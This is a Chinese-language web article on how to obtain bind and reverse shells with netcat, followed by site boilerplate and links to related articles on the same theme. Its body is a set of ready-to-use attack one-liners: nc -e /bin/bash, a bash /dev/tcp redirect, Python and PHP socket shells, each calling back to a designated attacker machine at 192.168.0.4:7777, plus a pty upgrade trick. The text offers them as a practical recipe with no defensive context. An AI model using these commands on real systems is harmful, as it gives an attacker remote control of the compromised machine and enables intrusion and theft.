iis服务器助手广告广告
返回顶部
首页 > 资讯 > 精选 >NC如何反弹shell
  • 126
分享到

NC如何反弹shell

2023-06-09 12:06:53 126人浏览 泡泡鱼
摘要

这篇文章给大家分享的是有关NC如何反弹shell的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。假如ubuntu、Centos为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口

这篇文章给大家分享的是有关NC如何反弹shell的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

假如ubuntuCentos为目标服务器系统

kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用

最终是将ubuntu、CentOS的shell反弹到kali上

正向反弹shell

ubuntu或者CentOS上面输入

nc -lvp 7777 -e /bin/bash

kali上输入

nc ip 7777

正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。

需要目标机安装nc。

反向反弹shell

方法1:bash反弹

bash -i >& /dev/tcp/ip/port 0>&1

但首先需要在kali上使用nc监听端口:

nc -lvp 7777

此方法在ubuntu下不会反弹成功,CentOS可以反弹成功。

方法2:python反弹

反弹shell的命令如下:

代码如下:

python -c "import os,Socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先,使用nc在kali上监听端口:

nc -lvp 7777

在CentOS或者ubuntu下使用Python去反向连接,输入:

代码如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

此方法ubuntu和linux均反弹成功。

方法3

首先在kali上输入nc监听:

nc -lvp 7777

在CentOS或者ubuntu 上使用nc去反向连接,命令如下:

nc -e /bin/bash 192.168.0.4 7777

方法4:php反弹shell

首先在kali上输入:

nc -lvp 7777

然后在目标机上输入:

PHP- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'


php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

注意php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。

 遇到反弹后不是正常的shell,可用命令:

python -c 'import pty;pty.spawn("/bin/bash")'

转化为常规的shell。

感谢各位的阅读!关于“NC如何反弹shell”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

--结束END--

本文标题: NC如何反弹shell

本文链接: https://www.lsjlt.com/news/255851.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • NC如何反弹shell
    这篇文章给大家分享的是有关NC如何反弹shell的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口...
    99+
    2023-06-09
  • Linux下NC反弹shell命令的使用方法
    小编给大家分享一下Linux下NC反弹shell命令的使用方法,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!什么是Linux系统Linux是一种免费使用和自由传播...
    99+
    2023-06-09
  • 反弹shell脚本(php-reverse-shell)
    平时经常打靶机 这里贴一个 反弹shell的脚本 array("pipe", "r"), // stdin is a pipe that the child will read from 1 ...
    99+
    2023-10-12
    php 反弹shell
  • Python3实现——反弹shell
    一、演示一下反弹shell的效果0、看一下python版本1、我们这边是服务端客户端连接后就可以输入命令了,比如下面截图中输入的pwd2、目标机是客户端,输入ip和端口二、代码+注释0、服务端1、客户端...
    99+
    2023-01-31
    shell
  • 反弹shell的姿势有哪些
    这篇文章主要介绍反弹shell的姿势有哪些,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!Linux 反弹shell姿势一:bash反弹bash -i >& /dev/tcp...
    99+
    2023-06-20
  • Linux的反弹shell命令的解析
    这篇文章主要介绍“Linux的反弹shell命令的解析”,在日常操作中,相信很多人在Linux的反弹shell命令的解析问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”Linux的反弹shell命令的解析”的疑...
    99+
    2023-06-16
  • Linux之bash反弹shell原理是什么
    这篇文章将为大家详细讲解有关Linux之bash反弹shell原理是什么,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。什么是Linux系统Linux是一种免费使用和自由传播的类UNIX操作系统,是一个基于...
    99+
    2023-06-09
  • linux中反弹shell的原理是什么
    这期内容当中小编将会给大家带来有关linux中反弹shell的原理是什么,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。什么是Linux系统Linux是一种免费使用和自由传播的类UNIX操作系统,是一个基于...
    99+
    2023-06-09
  • Tomcat弱口令复现及利用(反弹shell)
    目录漏洞描述复现环境攻击流程利用msf利用反弹shell利用参考文章漏洞描述 Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf\tomcat-users....
    99+
    2024-04-02
  • Linux下反弹CmdLine Shell小技巧有哪些
    这篇文章主要为大家展示了“Linux下反弹CmdLine Shell小技巧有哪些”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“Linux下反弹CmdLine Shell小技巧有哪些”这篇文章吧。...
    99+
    2023-06-17
  • Unity如何实现桌面反弹
    这篇文章将为大家详细讲解有关Unity如何实现桌面反弹,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。一:演示视频二:代码实现using UnityEngine; public ...
    99+
    2023-06-15
  • nc命令如何使用
    这篇文章主要介绍“nc命令如何使用”,在日常操作中,相信很多人在nc命令如何使用问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”nc命令如何使用”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!例子: 1) 监...
    99+
    2023-06-27
  • Pygame如何实现反弹球小游戏
    这篇文章主要为大家展示了“Pygame如何实现反弹球小游戏”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“Pygame如何实现反弹球小游戏”这篇文章吧。一、准备中1)游戏规则比平常的乒乓球更简单,...
    99+
    2023-06-29
  • JavaScript如何实现反弹动画效果
    小编给大家分享一下JavaScript如何实现反弹动画效果,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!代码如下:<!DO...
    99+
    2024-04-02
  • C++ BoostAsyncSocket如何实现异步反弹通信
    这篇文章主要介绍“C++ BoostAsyncSocket如何实现异步反弹通信”,在日常操作中,相信很多人在C++ BoostAsyncSocket如何实现异步反弹通信问题上存在疑惑,小编查阅了各式资料,整理出简单好用的...
    99+
    2023-07-05
  • Linux nc命令如何使用
    这篇文章主要介绍了Linux nc命令如何使用的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇Linux nc命令如何使用文章都会有所收获,下面我们一起来看看吧。一、命令简介nc是netcat...
    99+
    2023-07-05
  • Linux中如何使用nc命令
    小编给大家分享一下Linux中如何使用nc命令,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!1. 前言netcat(简称nc)是一个简单但功能强大的网络命令行工具...
    99+
    2023-06-15
  • Linux系统nc命令该如何使用
    Linux系统nc命令该如何使用,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。在Linux系统中netcat(nc)是一个非常强大的工具,被誉为网络安全界的瑞士军刀。在Linu...
    99+
    2023-06-28
  • Linux系统中nc命令如何使用
    这期内容当中小编将会给大家带来有关Linux系统中nc命令如何使用,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。nc可以提供如下的网络功能: 1) 监听特定端口,这时候nc就可以作为一个服务器,但是我发现...
    99+
    2023-06-13
  • 如何解决win10老自动弹出反馈中心的问题
    这篇文章将为大家详细讲解有关如何解决win10老自动弹出反馈中心的问题,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。首先我们需要点击开始菜单,接着选择设置。在打开的设置界面中,点击系统。接着在系统界面中,...
    99+
    2023-06-10
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作